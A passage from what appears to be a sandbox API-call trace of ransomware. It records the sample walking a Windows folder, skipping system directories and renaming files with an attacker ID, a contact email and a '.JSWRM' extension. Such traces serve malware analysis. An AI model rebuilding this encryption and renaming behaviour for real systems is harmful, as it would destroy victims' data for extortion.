lpBuffer=0x24d1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8, lpNumberOfBytesRead=0x345ec04*=0x0, lpOverlapped=0x0) returned 0 [0068.413] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0068.413] CloseHandle (hObject=0xffffffff) returned 1 [0068.413] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224bb8 [0068.413] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.413] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.413] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.413] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.413] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.413] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.413] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0068.413] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.413] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0068.413] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0068.413] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0068.413] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0068.413] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.414] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipscat.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscat.xml"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipscat.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscat.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.414] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.414] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224bb8 | out: hHeap=0x1e0000) returned 1 [0068.414] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225080 | out: hHeap=0x1e0000) returned 1 [0068.414] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d126e12, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7d126e12, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7d126e12, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x99e, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="ipschs.xml", cAlternateFileName="")) returned 1 [0068.414] lstrcmpiW (lpString1="ipschs.xml", lpString2=".") returned 1 [0068.414] lstrcmpiW (lpString1="ipschs.xml", lpString2="..") returned 1 [0068.414] lstrcmpiW (lpString1="ipschs.xml", lpString2="...") returned 1 [0068.414] lstrcmpiW (lpString1="ipschs.xml", lpString2="windows") returned -1 [0068.414] lstrcmpiW (lpString1="ipschs.xml", lpString2="recovery") returned -1 [0068.414] lstrcmpiW (lpString1="ipschs.xml", lpString2="perflogs") returned -1 [0068.414] lstrcmpiW (lpString1="ipschs.xml", lpString2="documents and settings") returned 1 [0068.414] lstrcmpiW (lpString1="ipschs.xml", lpString2="$RECYCLE.BIN") returned 1 [0068.414] lstrcmpiW (lpString1="ipschs.xml", lpString2="system volume information") returned -1 [0068.414] lstrcmpiW (lpString1="ipschs.xml", lpString2="msocache") returned -1 [0068.414] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0068.414] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipschs.xml", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0068.414] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipschs.xml", cchWideChar=10, lpMultiByteStr=0x345ef40, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ipschs.xml", lpUsedDefaultChar=0x0) returned 10 [0068.414] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0068.414] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0068.414] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipschs.xml", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0068.414] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipschs.xml", cchWideChar=10, lpMultiByteStr=0x345ef10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ipschs.xml", lpUsedDefaultChar=0x0) returned 10 [0068.414] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0068.414] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2256e0 [0068.414] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225328 | out: hHeap=0x1e0000) returned 1 [0068.414] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.414] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.414] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0068.414] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipschs.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipschs.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.414] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=9665669283075672) returned 0 [0068.415] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.415] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d1d8 [0068.415] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24d1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8, lpNumberOfBytesRead=0x345ec04*=0x0, lpOverlapped=0x0) returned 0 [0068.415] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0068.415] CloseHandle (hObject=0xffffffff) returned 1 [0068.415] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2252a0 [0068.415] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.415] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.415] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f84e8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.415] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.415] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.415] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.415] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0068.415] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.415] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0068.415] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0068.415] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0068.415] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0068.415] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.415] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipschs.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipschs.xml"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipschs.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipschs.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.415] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.415] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2252a0 | out: hHeap=0x1e0000) returned 1 [0068.415] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0068.415] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d126e12, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7d126e12, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7d126e12, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x984, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="ipscht.xml", cAlternateFileName="")) returned 1 [0068.415] lstrcmpiW (lpString1="ipscht.xml", lpString2=".") returned 1 [0068.415] lstrcmpiW (lpString1="ipscht.xml", lpString2="..") returned 1 [0068.416] lstrcmpiW (lpString1="ipscht.xml", lpString2="...") returned 1 [0068.416] lstrcmpiW (lpString1="ipscht.xml", lpString2="windows") returned -1 [0068.416] lstrcmpiW (lpString1="ipscht.xml", lpString2="recovery") returned -1 [0068.416] lstrcmpiW (lpString1="ipscht.xml", lpString2="perflogs") returned -1 [0068.416] lstrcmpiW (lpString1="ipscht.xml", lpString2="documents and settings") returned 1 [0068.416] lstrcmpiW (lpString1="ipscht.xml", lpString2="$RECYCLE.BIN") returned 1 [0068.416] lstrcmpiW (lpString1="ipscht.xml", lpString2="system volume information") returned -1 [0068.416] lstrcmpiW (lpString1="ipscht.xml", lpString2="msocache") returned -1 [0068.416] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0068.416] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipscht.xml", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0068.416] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipscht.xml", cchWideChar=10, lpMultiByteStr=0x345ef40, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ipscht.xml", lpUsedDefaultChar=0x0) returned 10 [0068.416] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0068.416] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0068.416] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipscht.xml", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0068.416] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipscht.xml", cchWideChar=10, lpMultiByteStr=0x345ef10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ipscht.xml", lpUsedDefaultChar=0x0) returned 10 [0068.416] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0068.416] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224d50 [0068.416] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2256e0 | out: hHeap=0x1e0000) returned 1 [0068.416] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.416] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.416] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0068.416] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipscht.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscht.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.416] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=9655155203134792) returned 0 [0068.416] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.416] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d1d8 [0068.416] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24d1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8, lpNumberOfBytesRead=0x345ec04*=0x0, lpOverlapped=0x0) returned 0 [0068.416] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0068.416] CloseHandle (hObject=0xffffffff) returned 1 [0068.417] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224dd8 [0068.417] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.417] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.417] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f84e8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.417] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.417] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.417] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.417] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0068.417] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.417] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0068.417] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0068.417] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0068.417] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0068.417] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.417] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipscht.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscht.xml"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipscht.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscht.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.417] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.417] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224dd8 | out: hHeap=0x1e0000) returned 1 [0068.417] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0068.417] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c940eb6, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7c940eb6, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7c940eb6, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x9fc, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="ipscsy.xml", cAlternateFileName="")) returned 1 [0068.417] lstrcmpiW (lpString1="ipscsy.xml", lpString2=".") returned 1 [0068.417] lstrcmpiW (lpString1="ipscsy.xml", lpString2="..") returned 1 [0068.417] lstrcmpiW (lpString1="ipscsy.xml", lpString2="...") returned 1 [0068.417] lstrcmpiW (lpString1="ipscsy.xml", lpString2="windows") returned -1 [0068.417] lstrcmpiW (lpString1="ipscsy.xml", lpString2="recovery") returned -1 [0068.417] lstrcmpiW (lpString1="ipscsy.xml", lpString2="perflogs") returned -1 [0068.417] lstrcmpiW (lpString1="ipscsy.xml", lpString2="documents and settings") returned 1 [0068.417] lstrcmpiW (lpString1="ipscsy.xml", lpString2="$RECYCLE.BIN") returned 1 [0068.417] lstrcmpiW (lpString1="ipscsy.xml", lpString2="system volume information") returned -1 [0068.417] lstrcmpiW (lpString1="ipscsy.xml", lpString2="msocache") returned -1 [0068.417] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0068.417] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipscsy.xml", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0068.417] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipscsy.xml", cchWideChar=10, lpMultiByteStr=0x345ef40, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ipscsy.xml", lpUsedDefaultChar=0x0) returned 10 [0068.418] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0068.418] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0068.418] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipscsy.xml", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0068.418] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipscsy.xml", cchWideChar=10, lpMultiByteStr=0x345ef10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ipscsy.xml", lpUsedDefaultChar=0x0) returned 10 [0068.418] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0068.418] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225768 [0068.418] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224d50 | out: hHeap=0x1e0000) returned 1 [0068.418] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.418] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.418] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0068.418] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipscsy.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscsy.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.426] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=9666253398624936) returned 0 [0068.426] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.426] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d1d8 [0068.426] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24d1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8, lpNumberOfBytesRead=0x345ec04*=0x0, lpOverlapped=0x0) returned 0 [0068.426] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0068.426] CloseHandle (hObject=0xffffffff) returned 1 [0068.426] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224d50 [0068.426] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.426] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.426] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f84e8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.426] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.426] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.426] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.426] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a348 [0068.426] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a348, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.426] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a348 | out: hHeap=0x1e0000) returned 1 [0068.426] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0068.426] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0068.426] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0068.426] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.426] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipscsy.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscsy.xml"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipscsy.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscsy.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.427] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.427] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224d50 | out: hHeap=0x1e0000) returned 1 [0068.427] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0068.427] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d126e12, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7d126e12, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7d126e12, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x9d2, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="ipsdan.xml", cAlternateFileName="")) returned 1 [0068.427] lstrcmpiW (lpString1="ipsdan.xml", lpString2=".") returned 1 